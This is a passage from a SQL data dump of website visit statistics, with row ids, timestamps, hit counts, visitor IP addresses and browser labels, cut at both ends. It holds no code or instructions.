.243','other'),(328367,1541743598,1,1,0,0,'46.229.168.139','other'),(328368,1541743622,2,2,0,0,'188.32.106.38','chrome'),(328369,1541743796,1,1,0,0,'157.55.39.152','other'),(328370,1541743807,1,1,0,0,'66.249.66.157','chrome'),(328371,1541743809,1,1,0,0,'66.249.66.155','chrome'),(328372,1541743810,2,2,0,0,'66.249.66.152','chrome'),(328373,1541743854,1,1,0,0,'54.36.148.213','other'),(328374,1541743945,2,2,0,0,'46.229.168.148','other'),(328375,1541743963,1,1,0,0,'95.163.255.115','other'),(328376,1541743967,1,1,0,0,'95.163.255.113','other'),(328377,1541743972,1,1,0,0,'95.163.255.117','other'),(328378,1541743977,1,1,0,0,'95.163.255.118','other'),(328379,1541743981,1,1,0,0,'95.163.255.112','other'),(328380,1541743985,1,1,0,0,'95.163.255.103','other'),(328381,1541744697,1,1,0,0,'46.229.168.132','other'),(328382,1541744904,1,1,0,0,'54.36.149.11','other'),(328383,1541744906,1,1,0,0,'37.53.156.3','chrome'),(328384,1541744928,1,1,0,0,'54.36.148.185','other'),(328385,1541745130,3,3,0,0,'216.244.66.241','other'),(328386,1541745218,1,1,0,0,'54.36.149.47','other'),(328387,1541745438,1,1,0,0,'66.249.66.152','chrome'),(328388,1541745467,1,1,0,0,'54.36.149.105','other'),(328389,1541745640,2,2,0,0,'91.196.178.93','chrome'),(328390,1541745739,1,1,0,0,'89.163.131.166','other'),(328391,1541745837,1,1,0,0,'54.36.149.100','other'),(328392,1541746045,1,1,0,0,'54.36.149.57','other'),(328393,1541746231,1,1,0,0,'8.29.198.27','other'),(328394,1541746345,1,1,0,0,'54.36.149.25','other'),(328395,1541746464,2,2,0,0,'66.249.66.22','chrome'),(328396,1541746535,1,1,0,0,'66.249.66.156','chrome'),(328397,1541746879,1,1,0,0,'66.249.66.152','chrome'),(328398,1541746976,1,1,0,0,'54.36.148.66','other'),(328399,1541747105,1,1,0,0,'46.229.168.152','other'),(328400,1541747524,3,3,0,0,'216.244.66.241','other'),(328401,1541747536,1,1,0,0,'54.36.148.67','other'),(328402,1541747559,1,1,0,0,'54.36.148.18','other'),(328403,1541747816,1,1,0,0,'157.55.39.243','other'),(328404,1541747876,1,1,0,0,'77.52.210.59','chrome'),(328405,1541747895,2,2,0,0,'8.29.198.25','other'),(328406,1541748315,1,1,0,0,'54.36.149.8','other'),(328407,1541748718,1,1,0,0,'66.249.66.152','chrome'),(328408,1541748745,1,1,0,0,'37.53.156.3','chrome'),(328409,1541748860,1,1,0,0,'54.36.148.53','other'),(328410,1541748876,1,1,0,0,'46.229.168.141','other'),(328411,1541748880,1,1,0,0,'46.229.168.148','other'),(328412,1541749014,1,1,0,0,'54.36.149.46','other'),(328413,1541749054,1,1,0,0,'54.36.149.63','other'),(328414,1541749073,1,1,0,0,'46.229.168.130','other'),(328415,1541749076,1,1,0,0,'46.229.168.142','other'),(328416,1541749288,1,1,0,0,'54.36.148.138','other'),(328417,1541749374,1,1,0,0,'54.36.148.227','other'),(328418,1541749402,1,1,0,0,'54.36.148.73','other'),(328419,1541749580,1,1,0,0,'54.36.148.175','other'),(328420,1541749879,1,1,0,0,'54.36.149.24','other'),(328421,1541749972,1,1,0,0,'54.36.149.12','other'),(328422,1541750036,4,4,0,0,'216.244.66.241','other'),(328423,1541750047,1,1,0,0,'54.36.149.95','other'),(328424,1541750164,1,1,0,0,'54.36.148.221','other'),(328425,1541750211,1,1,0,0,'54.36.148.101','other'),(328426,1541750433,3,3,0,0,'66.249.66.154','chrome'),(328427,1541750924,4,4,0,0,'66.249.66.155','chrome'),(328428,1541750926,1,1,0,0,'66.249.66.156','chrome'),(328429,1541751028,2,2,0,0,'66.249.66.152','chrome'),(328430,1541751062,1,1,0,0,'54.36.149.98','other'),(328431,1541751108,1,1,0,0,'54.36.148.60','other'),(328432,1541751109,1,1,0,0,'95.163.255.99','other'),(328433,1541751114,1,1,0,0,'95.163.255.95','other'),(328434,1541751137,1,1,0,0,'66.249.66.157','chrome'),(328435,1541751423,1,1,0,0,'54.36.148.18','other'),(328436,1541751437,2,2,0,0,'91.196.178.93','chrome'),(328437,1541751446,1,1,0,0,'54.36.148.234','other'),(328438,1541751469,2,2,0,0,'216.244.65.10','chrome'),(328439,1541751506,1,1,0,0,'54.36.149.106','other'),(328440,1541751635,1,1,0,0,'66.249.66.154','chrome'),(328441,1541751652,1,1,0,0,'54.36.148.179','other'),(328442,1541751688,1,1,0,0,'66.249.66.61','chrome'),(328443,1541751689,1,1,0,0,'66.249.66.42','chrome'),(328444,1541751794,2,2,0,0,'95.134.48.53','chrome'),(328445,1541751806,5,5,0,0,'220.243.135.227','chrome'),(328447,1541751807,1,1,0,0,'220.243.135.68','chrome'),(328457,1541751808,2,2,0,0,'220.243.136.38','chrome'),(328462,1541751809,2,2,0,0,'220.243.135.38','chrome'),(328469,1541751810,1,1,0,0,'220.243.135.236','chrome'),(328477,1541751811,1,1,0,0,'220.243.136.17','chrome'),(328478,1541751812,1,1,0,0,'220.243.135.206','chrome'),(328482,1541751814,1,1,0,0,'52.80.200.81','chrome'),(328484,1541751817,1,1,0,0,'54.36.148.229','other'),(328485,1541752093,1,1,0,0,'54.36.148.230','other'),(328486,1541752384,1,1,0,0,'54.36.148.115','other'),(328487,1541752578,1,1,0,0,'66.249.66.44','chrome'),(328488,1541753468,2,2,0,0,'46.229.168.130','other'),(328489,1541753492,1,1,0,0,'178.95.246.220','chrome'),(328490,1541753637,2,2,0,0,'195.230.119.58','chrome'),(328491,1541753900,1,1,0,0,'54.36.148.84','other'),(328492,1541754056,1,1,0,0,'157.55.39.243','other'),(328493,1541754144,1,1,0,0,'37.53.156.3','chrome'),(328494,1541754168,1,1,0,0,'54.36.148.108','other'),(328495,1541754280,1,1,0,0,'54.36.149.48','other'),(328496,1541754657,1,1,0,0,'141.8.142.108','other'),(328497,1541754670,6,6,0,0,'178.154.244.29','other'),(328498,1541754673,1,1,0,0,'54.36.148.170','other'),(328499,1541754775,1,1,0,0,'178.154.244.11','other'),(328500,1541754910,1,1,0,0,'5.45.207.19','other'),(328501,1541754944,1,1,0,0,'46.229.168.149','other'),(328502,1541754947,1,1,0,0,'46.229.168.133','other'),(328503,1541754984,2,2,0,0,'5.45.207.79','other'),(328504,1541755055,1,1,0,0,'54.36.148.250','other'),(328505,1541755143,1,1,0,0,'95.108.213.4','other'),(328506,1541755494,1,1,0,0,'54.36.148.178','other'),(328507,1541755529,1,1,0,0,'54.36.148.57','other'),(328508,1541755545,1,1,0,0,'54.36.148.69','other'),(328509,1541755591,1,1,0,0,'87.250.224.65','other'),(328510,1541755705,1,1,0,0,'54.36.149.2','other'),(328511,1541755716,4,4,0,0,'178.154.244.11','other'),(328512,1541755764,1,1,0,0,'178.154.244.29','other'),(328513,1541755767,3,3,0,0,'216.244.66.241','other'),(328514,1541755803,1,1,0,0,'54.36.149.100','other'),(328515,1541756128,1,1,0,0,'54.36.148.218','other'),(328516,1541756144,1,1,0,0,'54.36.148.102','other'),(328517,1541756165,1,1,0,0,'91.196.178.93','chrome'),(328518,1541756245,1,1,0,0,'54.36.148.242','other'),(328519,1541756438,1,1,0,0,'66.249.66.152','chrome'),(328520,1541756524,1,1,0,0,'54.36.148.191','other'),(328521,1541756573,1,1,0,0,'54.36.148.255','other'),(328522,1541756577,1,1,0,0,'54.36.148.234','other'),(328523,1541756579,1,1,0,0,'54.36.148.88','other'),(328524,1541757103,1,1,0,0,'8.29.198.26','other'),(328525,1541757430,2,2,0,0,'176.193.130.222','chrome'),(328526,1541757685,1,1,0,0,'91.196.178.136','chrome'),(328527,1541757704,1,1,0,0,'66.249.66.40','chrome'),(328528,1541757719,1,1,0,0,'54.36.148.231','other'),(328529,1541757828,2,2,0,0,'91.124.182.170','firefox'),(328530,1541757974,2,2,0,0,'216.244.66.241','other'),(328531,1541758184,1,1,0,0,'54.36.148.242','other'),(328532,1541758403,1,1,0,0,'46.133.28.160','firefox'),(328533,1541758630,3,3,0,0,'46.30.166.126','chrome'),(328534,1541758743,1,1,0,0,'8.29.198.25','other'),(328535,1541758869,1,1,0,0,'54.36.148.186','other'),(328536,1541758998,2,2,0,0,'37.144.45.65','chrome'),(328537,1541759128,1,1,0,0,'54.36.148.101','other'),(328538,1541759191,1,1,0,0,'8.29.198.27','other'),(328539,1541759861,1,1,0,0,'46.229.168.152','other'),(328540,1541760019,1,1,0,0,'46.229.168.138','other'),(328541,1541760216,1,1,0,0,'54.36.148.193','other'),(328542,1541760452,1,1,0,0,'54.36.148.117','other'),(328543,1541760472,5,5,0,0,'216.244.66.241','other'),(328544,1541761147,1,1,0,0,'54.36.149.104','other'),(328545,1541761196,1,1,0,0,'54.36.148.102','other'),(328546,1541762024,1,1,0,0,'62.205.134.182','msie'),(328547,1541762143,1,1,0,0,'54.36.149.17','other'),(328548,1541762210,1,1,0,0,'66.249.66.157','chrome'),(328549,1541762286,1,1,0,0,'54.36.148.225','other'),(328550,1541762299,1,1,0,0,'54.36.148.193','other'),(328551,1541762641,3,3,0,0,'216.244.66.241','other'),(328552,1541762788,1,1,0,0,'54.36.148.209','other'),(328553,1541762903,1,1,0,0,'54.36.148.220','other'),(328554,1541763142,1,1,0,0,'54.36.148.202','other'),(328555,1541763318,1,1,0,0,'54.36.148.127','other'),(328556,1541763781,1,1,0,0,'54.36.148.19','other'),(328557,1541764146,1,1,0,0,'54.36.148.138','other'),(328558,1541764170,1,1,0,0,'54.36.149.27','other'),(328559,1541764263,1,1,0,0,'54.36.148.150','other'),(328560,1541764298,1,1,0,0,'54.36.148.67','other'),(328561,1541764457,1,1,0,0,'54.36.148.243','other'),(328562,1541765040,1,1,0,0,'66.249.66.57','chrome'),(328563,1541765044,1,1,0,0,'54.36.148.39','other'),(328564,1541765047,1,1,0,0,'66.249.66.40','chrome'),(328565,1541765212,1,1,0,0,'54.36.148.187','other'),(328566,1541765301,1,1,0,0,'54.36.149.89','other'),(328567,1541765347,1,1,0,0,'66.249.66.152','chrome'),(328568,1541765363,1,1,0,0,'54.36.149.80','other'),(328569,1541765479,4,4,0,0,'216.244.66.241','other'),(328570,1541765581,1,1,0,0,'46.229.168.145','other'),(328571,1541765586,1,1,0,0,'46.229.168.148','other'),(328572,1541765620,2,2,0,0,'66.249.66.155','chrome'),(328573,1541765711,1,1,0,0,'54.36.148.112','other'),(328574,1541766013,2,2,0,0,'66.249.66.156','chrome'),(328575,1541766076,1,1,0,0,'46.229.168.147','other'),(328576,1541766079,1,1,0,0,'54.36.149.48','other'),(328577,1541766166,1,1,0,0,'66.249.66.44','chrome'),(328578,1541766461,1,1,0,0,'66.249.66.154','chrome'),(328579,1541766706,1,1,0,0,'54.36.148.107','other'),(328580,1541767095,1,1,0,0,'54.36.148.84','other'),(328581,1541767259,1,1,0,0,'54.36.148.98','other'),(328582,1541767327,1,1,0,0,'54.36.148.180','other'),(328583,1541767456,1,1,0,0,'54.36.149.19','other'),(328584,1541767534,1,1,0,0,'54.36.148.244','other'),(328585,1541767563,1,1,0,0,'178.154.244.11','other'),(328586,1541767972,1,1,0,0,'8.29.198.27','other'),(328587,1541768186,1,1,0,0,'54.36.148.233','other'),(328588,1541768194,1,1,0,0,'54.36.148.45','other'),(328589,1541768368,1,1,0,0,'66.249.66.57','chrome'),(328590,1541768369,1,1,0,0,'66.249.66.44','chrome'),(328591,1541768543,1,1,0,0,'54.36.148.232','other'),(328592,1541768662,1,1,0,0,'216.244.66.241','other'),(328593,1541768679,1,1,0,0,'54.36.149.80','other'),(328594,1541768686,2,2,0,0,'207.46.13.190','other'),(328595,1541768857,1,1,0,0,'54.36.148.131','other'),(328596,1541768874,1,1,0,0,'66.249.66.152','chrome'),(328597,1541768913,1,1,0,0,'54.36.149.66','other'),(328598,1541769093,1,1,0,0,'54.36.148.97','other'),(328599,1541769105,1,1,0,0,'54.36.148.143','other'),(328600,1541769130,1,1,0,0,'92.113.19.146','chrome'),(328601,1541769408,1,1,0,0,'54.36.148.129','other'),(328602,1541769413,2,2,0,0,'66.249.66.156','chrome'),(328603,1541769529,1,1,0,0,'54.36.148.115','other'),(328604,1541769595,1,1,0,0,'8.29.198.26','other'),(328605,1541769785,1,1,0,0,'46.229.168.140','other'),(328606,1541769787,1,1,0,0,'46.229.168.130','other'),(328607,1541769989,1,1,0,0,'54.36.148.251','other'),(328608,1541770082,1,1,0,0,'8.29.198.27','other'),(328609,1541770163,1,1,0,0,'54.36.148.191','other'),(328610,1541770192,1,1,0,0,'92.113.188.255','other'),(328611,1541770266,1,1,0,0,'66.249.66.155','chrome'),(328613,1541770402,1,1,0,0,'54.36.148.152','other'),(328614,1541770427,1,1,0,0,'54.36.148.73','other'),(328615,1541770522,2,2,0,0,'95.163.255.95','other'),(328616,1541770813,1,1,0,0,'54.36.149.68','other'),(328617,1541770843,1,1,0,0,'54.36.148.69','other'),(328618,1541770889,3,3,0,0,'216.244.66.241','other'),(328619,1541771054,1,1,0,0,'54.208.102.37','other'),(328620,1541771056,1,1,0,0,'107.21.1.8','other'),(328621,1541771348,1,1,0,0,'54.36.148.80','other'),(328622,1541771441,1,1,0,0,'66.249.66.157','chrome'),(328623,1541772046,1,1,0,0,'66.249.66.156','chrome'),(328624,1541772142,2,2,0,0,'91.209.11.236','other'),(328625,1541772473,2,2,0,0,'46.229.168.148','other'),(328626,1541772476,1,1,0,0,'46.229.168.143','other'),(328627,1541772484,1,1,0,0,'54.36.148.82','other'),(328628,1541772572,1,1,0,0,'54.36.149.98','other'),(328629,1541772906,1,1,0,0,'54.36.148.106','other'),(328630,1541772931,1,1,0,0,'54.36.148.207','other'),(328631,1541772994,1,1,0,0,'54.36.148.232','other'),(328632,1541773010,1,1,0,0,'54.36.149.4','other'),(328633,1541773134,1,1,0,0,'46.229.168.145','other'),(328634,1541773367,1,1,0,0,'54.36.148.84','other'),(328635,1541773389,1,1,0,0,'95.163.255.113','other'),(328636,1541773402,1,1,0,0,'95.163.255.115','other'),(328637,1541773446,1,1,0,0,'54.36.148.248','other'),(328638,1541773579,1,1,0,0,'54.36.148.209','other'),(328639,1541773599,1,1,0,0,'54.36.148.185','other'),(328640,1541773640,4,4,0,0,'216.244.66.241','other'),(328641,1541773689,1,1,0,0,'54.36.148.158','other'),(328642,1541773779,1,1,0,0,'207.46.13.190','other'),(328643,1541773793,1,1,0,0,'54.36.148.87','other'),(328644,1541773854,1,1,0,0,'54.36.148.188','other'),(328645,1541773873,2,2,0,0,'95.163.255.94','other'),(328646,1541773878,2,2,0,0,'46.211.117.194','chrome'),(328647,1541773885,2,2,0,0,'95.163.255.92','other'),(328648,1541774072,1,1,0,0,'54.36.148.58','other'),(328649,1541774161,1,1,0,0,'66.249.66.152','chrome'),(328650,1541774229,1,1,0,0,'54.36.148.190','other'),(328651,1541775653,1,1,0,0,'54.36.148.231','other'),(328652,1541775707,1,1,0,0,'54.36.148.104','other'),(328653,1541775737,1,1,0,0,'54.36.148.150','other'),(328654,1541776003,4,4,0,0,'216.244.66.241','other'),(328655,1541776032,1,1,0,0,'54.36.148.206','other'),(328656,1541776199,1,1,0,0,'54.36.149.22','other'),(328657,1541776396,1,1,0,0,'185.120.89.4','chrome'),(328658,1541776592,1,1,0,0,'207.46.13.190','other'),(328660,1541776623,1,1,0,0,'46.229.168.137','other'),(328661,1541776851,1,1,0,0,'54.36.148.10','other'),(328662,1541776924,1,1,0,0,'216.244.66.241','other'),(328663,1541777076,1,1,0,0,'54.36.148.250','other'),(328664,1541777086,1,1,0,0,'54.36.148.160','other'),(328665,1541777172,1,1,0,0,'46.229.168.150','other'),(328666,1541777411,1,1,0,0,'54.36.149.39','other'),(328667,1541777603,1,1,0,0,'54.36.149.107','other'),(328668,1541778296,2,2,0,0,'66.249.64.199','chrome'),(328670,1541778312,1,1,0,0,'66.249.64.220','chrome'),(328671,1541778417,1,1,0,0,'54.36.149.11','other'),(328672,1541778576,2,2,0,0,'216.244.66.241','other'),(328673,1541778818,1,1,0,0,'8.29.198.26','other'),(328674,1541779014,1,1,0,0,'54.36.149.27','other'),(328675,1541779050,1,1,0,0,'54.36.149.54','other'),(328676,1541779304,1,1,0,0,'54.36.148.125','other'),(328677,1541779504,1,1,0,0,'66.249.64.220','chrome'),(328678,1541779538,1,1,0,0,'216.244.66.241','other'),(328679,1541779772,1,1,0,0,'54.36.149.16','other'),(328680,1541779946,9,9,0,0,'37.57.218.243','other'),(328681,1541779956,2,2,0,0,'5.9.70.117','other'),(328682,1541780286,1,1,0,0,'46.229.168.135','other'),(328683,1541780431,2,2,0,0,'8.29.198.25','other'),(328684,1541780523,1,1,0,0,'180.76.15.162','other'),(328685,1541780524,1,1,0,0,'180.76.15.144','other'),(328686,1541780636,1,1,0,0,'46.229.168.150','other'),(328687,1541780827,1,1,0,0,'54.36.149.96','other'),(328688,1541780995,2,2,0,0,'54.36.149.102','other'),(328689,1541781769,3,3,0,0,'178.154.244.29','other'),(328690,1541781829,1,1,0,0,'91.196.178.132','chrome'),(328691,1541781882,3,3,0,0,'216.244.66.241','other'),(328692,1541781946,1,1,0,0,'54.36.148.88','other'),(328693,1541782454,2,2,0,0,'5.58.64.186','opera'),(328694,1541782519,1,1,0,0,'178.154.244.11','other'),(328695,1541782667,1,1,0,0,'54.36.149.89','other'),(328696,1541782780,1,1,0,0,'54.36.148.231','other'),(328697,1541782874,1,1,0,0,'54.36.148.37','other'),(328698,1541783032,1,1,0,0,'54.36.148.66','other'),(328699,1541783063,1,1,0,0,'91.196.178.132','chrome'),(328700,1541783099,1,1,0,0,'54.36.148.168','other'),(328701,1541783143,1,1,0,0,'54.36.148.189','other'),(328702,1541783282,1,1,0,0,'54.36.148.90','other'),(328703,1541783356,4,4,0,0,'5.58.64.186','opera'),(328704,1541783419,1,1,0,0,'66.249.64.40','chrome'),(328705,1541783701,1,1,0,0,'54.36.148.10','other'),(328706,1541783740,1,1,0,0,'54.36.149.45','other'),(328707,1541783873,1,1,0,0,'54.36.148.88','other'),(328708,1541783980,1,1,0,0,'54.36.148.46','other'),(328709,1541784102,1,1,0,0,'54.36.149.70','other'),(328710,1541784178,1,1,0,0,'54.36.148.213','other'),(328711,1541784360,3,3,0,0,'216.244.66.241','other'),(328712,1541784432,8,8,0,0,'178.154.244.29','other'),(328713,1541784443,1,1,0,0,'54.36.149.65','other'),(328714,1541784524,1,1,0,0,'37.9.113.20','other'),(328715,1541784538,1,1,0,0,'5.45.207.79','other'),(328716,1541784753,1,1,0,0,'54.36.149.44','other'),(328717,1541784844,2,2,0,0,'178.154.244.11','other'),(328718,1541785089,1,1,0,0,'178.212.111.36','chrome'),(328719,1541785143,1,1,0,0,'95.108.213.4','other'),(328720,1541785161,1,1,0,0,'94.23.58.212','other'),(328721,1541785197,2,2,0,0,'141.8.142.103','other'),(328722,1541785450,1,1,0,0,'37.9.113.20','other'),(328723,1541785501,1,1,0,0,'54.36.148.197','other'),(328724,1541785599,3,3,0,0,'178.154.244.29','other'),(328725,1541785622,1,1,0,0,'95.163.255.96','other'),(328726,1541785629,1,1,0,0,'95.163.255.98','other'),(328727,1541785695,1,1,0,0,'37.9.113.148','other'),(328728,1541785720,1,1,0,0,'5.45.207.19','other'),(328729,1541786280,2,2,0,0,'46.211.74.8','chrome'),(328730,1541786448,2,2,0,0,'46.211.107.83','chrome'),(328731,1541786677,1,1,0,0,'54.36.149.43','other'),(328732,1541786716,1,1,0,0,'54.36.148.98','other'),(328733,1541786748,1,1,0,0,'54.36.148.245','other'),(328734,1541786755,1,1,0,0,'54.36.149.59','other'),(328735,1541786775,1,1,0,0,'54.36.148.115','other'),(328736,1541786872,3,3,0,0,'216.244.66.241','other'),(328737,1541786902,1,1,0,0,'178.154.244.29','other'),(328738,1541787164,1,1,0,0,'54.36.148.179','other'),(328739,1541787505,1,1,0,0,'54.36.148.131','other'),(328740,1541787749,1,1,0,0,'207.46.13.190','other'),(328741,1541788179,1,1,0,0,'54.36.148.14','other'),(328742,1541788435,1,1,0,0,'54.36.148.164','other'),(328743,1541788589,1,1,0,0,'54.36.149.30','other'),(328744,1541788695,1,1,0,0,'54.36.148.201','other'),(328745,1541788869,1,1,0,0,'46.211.9.225','chrome'),(328746,1541788909,1,1,0,0,'91.196.178.164','chrome'),(328747,1541789173,1,1,0,0,'54.36.148.79','other'),(328748,1541789291,1,1,0,0,'54.36.149.87','other'),(328749,1541789302,1,1,0,0,'54.36.148.62','other'),(328750,1541789390,1,1,0,0,'54.36.149.52','other'),(328751,1541789629,1,1,0,0,'66.249.64.199','chrome'),(328752,1541789643,1,1,0,0,'66.249.64.218','chrome'),(328753,1541789694,1,1,0,0,'8.29.198.27','other'),(328754,1541789723,2,2,0,0,'207.46.13.190','other'),(328755,1541789992,1,1,0,0,'178.92.73.217','chrome'),(328756,1541790756,1,1,0,0,'54.36.148.127','other'),(328757,1541790861,1,1,0,0,'178.255.215.94','other'),(328758,1541790921,1,1,0,0,'54.36.148.202','other'),(328759,1541790986,1,1,0,0,'95.46.140.38','opera'),(328760,1541791055,1,1,0,0,'54.36.149.56','other'),(328761,1541791291,1,1,0,0,'8.29.198.26','other'),(328762,1541791333,1,1,0,0,'54.36.148.212','other'),(328763,1541791370,2,2,0,0,'95.163.255.97','other'),(328764,1541791377,1,1,0,0,'95.163.255.99','other'),(328765,1541791431,1,1,0,0,'95.163.255.94','other'),(328766,1541791752,1,1,0,0,'66.249.64.59','chrome'),(328767,1541791755,1,1,0,0,'66.249.64.40','chrome'),(328768,1541791793,1,1,0,0,'8.29.198.27','other'),(328769,1541791803,1,1,0,0,'66.249.64.222','chrome'),(328770,1541792052,1,1,0,0,'66.249.64.201','chrome'),(328771,1541792083,1,1,0,0,'66.249.64.220','chrome'),(328772,1541792184,1,1,0,0,'95.46.140.38','msie'),(328773,1541792220,2,2,0,0,'66.249.64.195','chrome'),(328774,1541792234,2,2,0,0,'66.249.64.218','chrome'),(328775,1541792322,4,4,0,0,'216.244.66.241','other'),(328776,1541792414,2,2,0,0,'207.46.13.117','other'),(328777,1541792800,1,1,0,0,'54.36.149.40','other'),(328778,1541793054,1,1,0,0,'54.36.148.97','other'),(328779,1541793121,1,1,0,0,'54.36.148.234','other'),(328780,1541793145,4,4,0,0,'66.249.64.218','chrome'),(328781,1541793220,4,4,0,0,'66.249.64.195','chrome'),(328782,1541793247,3,3,0,0,'66.249.64.222','chrome'),(328783,1541793405,1,1,0,0,'54.36.148.27','other'),(328784,1541793524,1,1,0,0,'66.249.64.199','chrome'),(328785,1541794017,1,1,0,0,'54.36.148.209','other'),(328786,1541794022,1,1,0,0,'66.249.64.201','chrome'),(328787,1541794025,1,1,0,0,'209.90.225.42','chrome'),(328788,1541794051,1,1,0,0,'54.36.148.163','other'),(328789,1541794126,1,1,0,0,'54.36.148.200','other'),(328790,1541794156,1,1,0,0,'66.249.64.220','chrome'),(328791,1541794300,1,1,0,0,'54.36.148.187','other'),(328792,1541794304,5,5,0,0,'216.244.66.241','other'),(328793,1541794485,1,1,0,0,'66.249.64.218','chrome'),(328794,1541794509,1,1,0,0,'54.36.148.210','other'),(328795,1541794734,2,2,0,0,'54.36.148.184','other'),(328796,1541794796,1,1,0,0,'54.36.148.18','other'),(328797,1541794901,1,1,0,0,'54.36.149.47','other'),(328798,1541795118,1,1,0,0,'66.249.64.195','chrome'),(328799,1541795161,1,1,0,0,'54.36.148.220','other'),(328800,1541795299,1,1,0,0,'54.36.148.248','other'),(328801,1541795415,1,1,0,0,'54.36.149.8','other'),(328802,1541795530,3,3,0,0,'54.165.59.7','other'),(328803,1541795542,1,1,0,0,'54.36.149.107','other'),(328804,1541795563,1,1,0,0,'54.36.148.60','other'),(328805,1541795586,1,1,0,0,'157.55.39.243','other'),(328806,1541795762,1,1,0,0,'66.249.64.40','chrome'),(328807,1541796052,1,1,0,0,'66.249.64.218','chrome'),(328808,1541796257,1,1,0,0,'54.36.149.27','other'),(328809,1541796258,1,1,0,0,'54.36.148.220','other'),(328810,1541796514,1,1,0,0,'54.36.148.161','other'),(328811,1541796838,1,1,0,0,'54.36.149.50','other'),(328812,1541796916,1,1,0,0,'54.36.148.140','other'),(328813,1541796928,2,2,0,0,'66.249.64.201','chrome'),(328814,1541796931,2,2,0,0,'66.249.64.220','chrome'),(328815,1541796977,1,1,0,0,'54.36.149.85','other'),(328816,1541797041,3,3,0,0,'54.165.59.7','other'),(328817,1541797166,1,1,0,0,'216.244.66.241','other'),(328818,1541797356,1,1,0,0,'66.249.64.59','chrome'),(328819,1541797358,1,1,0,0,'66.249.64.40','chrome'),(328820,1541797497,1,1,0,0,'54.36.148.114','other'),(328821,1541797732,1,1,0,0,'54.36.149.93','other'),(328822,1541797858,1,1,0,0,'54.36.149.78','other'),(328823,1541797951,1,1,0,0,'54.36.148.249','other'),(328824,1541798039,1,1,0,0,'54.165.59.7','other'),(328825,1541798476,1,1,0,0,'54.36.149.1','other'),(328826,1541798524,2,2,0,0,'66.249.64.61','chrome'),(328827,1541798541,2,2,0,0,'66.249.64.42','chrome'),(328828,1541798610,1,1,0,0,'54.36.148.238','other'),(328829,1541798639,1,1,0,0,'66.249.64.57','chrome'),(328831,1541798715,1,1,0,0,'66.249.64.218','chrome'),(328832,1541798741,1,1,0,0,'54.36.148.20','other'),(328833,1541799257,2,2,0,0,'37.54.208.132','firefox'),(328834,1541799794,5,5,0,0,'216.244.66.241','other'),(328835,1541800160,1,1,0,0,'207.46.13.117','other'),(328836,1541800210,1,1,0,0,'54.36.149.20','other'),(328837,1541800212,1,1,0,0,'87.250.224.47','other'),(328838,1541800223,2,2,0,0,'178.154.244.11','other'),(328839,1541800257,6,6,0,0,'178.154.244.29','other'),(328840,1541800271,2,2,0,0,'5.45.207.79','other'),(328841,1541800552,1,1,0,0,'8.29.198.26','other'),(328842,1541800807,1,1,0,0,'54.36.148.247','other'),(328843,1541801101,1,1,0,0,'54.36.148.161','other'),(328844,1541801137,2,2,0,0,'37.9.113.148','other'),(328845,1541801164,1,1,0,0,'178.154.244.11','other'),(328846,1541801181,1,1,0,0,'54.36.148.183','other'),(328847,1541801184,6,6,0,0,'178.154.244.29','other'),(328848,1541801227,1,1,0,0,'66.249.64.220','chrome'),(328849,1541801266,1,1,0,0,'66.249.64.218','chrome'),(328850,1541801320,1,1,0,0,'54.36.149.9','other'),(328851,1541801343,1,1,0,0,'87.250.224.47','other'),(328852,1541801345,1,1,0,0,'54.36.148.14','other'),(328853,1541801355,1,1,0,0,'213.180.203.40','other'),(328854,1541801470,1,1,0,0,'54.36.148.189','other'),(328855,1541801618,1,1,0,0,'54.36.148.82','other'),(328856,1541801799,2,2,0,0,'95.108.213.4','other'),(328857,1541802140,2,2,0,0,'8.29.198.25','other'),(328858,1541802279,1,1,0,0,'54.36.148.255','other'),(328859,1541802361,1,1,0,0,'54.36.149.17','other'),(328860,1541802591,3,3,0,0,'216.244.66.241','other'),(328861,1541802957,1,1,0,0,'207.46.13.190','other'),(328862,1541803029,1,1,0,0,'54.36.149.21','other'),(328863,1541803158,1,1,0,0,'157.55.39.152','other'),(328864,1541803306,1,1,0,0,'66.249.64.218','chrome'),(328865,1541803450,1,1,0,0,'54.36.148.226','other'),(328866,1541803886,1,1,0,0,'54.36.148.203','other'),(328867,1541803967,1,1,0,0,'54.36.148.154','other'),(328868,1541804064,1,1,0,0,'54.36.148.251','other'),(328869,1541804090,1,1,0,0,'54.36.148.106','other'),(328870,1541804153,1,1,0,0,'54.36.148.22','other'),(328871,1541804242,1,1,0,0,'66.249.64.201','chrome'),(328872,1541804248,2,2,0,0,'66.249.64.218','chrome'),(328873,1541804277,1,1,0,0,'157.55.39.243','other'),(328875,1541804389,1,1,0,0,'54.36.148.58','other'),(328876,1541804882,1,1,0,0,'54.36.148.69','other'),(328877,1541805005,1,1,0,0,'54.36.149.18','other'),(328878,1541805630,1,1,0,0,'54.36.148.218','other'),(328879,1541805813,1,1,0,0,'54.36.148.224','other'),(328880,1541806016,1,1,0,0,'54.36.148.13','other'),(328881,1541806054,1,1,0,0,'54.36.148.140','other'),(328882,1541806127,2,2,0,0,'66.249.64.195','chrome'),(328884,1541806241,3,3,0,0,'66.249.64.220','chrome'),(328885,1541806388,1,1,0,0,'80.90.55.170','other'),(328886,1541806427,1,1,0,0,'54.36.148.78','other'),(328887,1541806558,1,1,0,0,'66.249.64.199','chrome'),(328888,1541806571,2,2,0,0,'178.93.178.26','chrome'),(328889,1541806659,1,1,0,0,'66.249.64.222','chrome'),(328890,1541806721,1,1,0,0,'66.249.64.201','chrome'),(328891,1541807103,3,3,0,0,'216.244.66.241','other'),(328892,1541807255,1,1,0,0,'66.249.64.61','chrome'),(328893,1541807271,1,1,0,0,'66.249.64.40','chrome'),(328894,1541807607,1,1,0,0,'207.46.13.117','other'),(328895,1541807718,1,1,0,0,'62.205.134.182','other'),(328896,1541807761,1,0,1,0,'66.249.64.218',''),(328897,1541807952,1,1,0,0,'54.36.148.248','other'),(328898,1541808025,1,0,1,0,'66.249.64.42',''),(328899,1541808103,1,1,0,0,'54.36.148.40','other'),(328900,1541808268,1,1,0,0,'66.249.64.199','chrome'),(328901,1541808343,1,1,0,0,'54.36.148.38','other'),(328902,1541808345,1,1,0,0,'54.36.149.70','other'),(328903,1541808525,1,1,0,0,'54.36.148.196','other'),(328904,1541808786,1,1,0,0,'207.46.13.190','other'),(328905,1541809026,1,1,0,0,'54.36.149.12','other'),(328906,1541809302,1,1,0,0,'54.36.148.131','other'),(328907,1541809414,1,1,0,0,'54.36.149.28','other'),(328908,1541809694,1,1,0,0,'54.36.149.50','other'),(328909,1541809804,1,1,0,0,'54.36.148.106','other'),(328910,1541809850,1,1,0,0,'54.36.149.33','other'),(328911,1541809975,1,1,0,0,'46.229.168.143','other'),(328912,1541810114,1,1,0,0,'54.36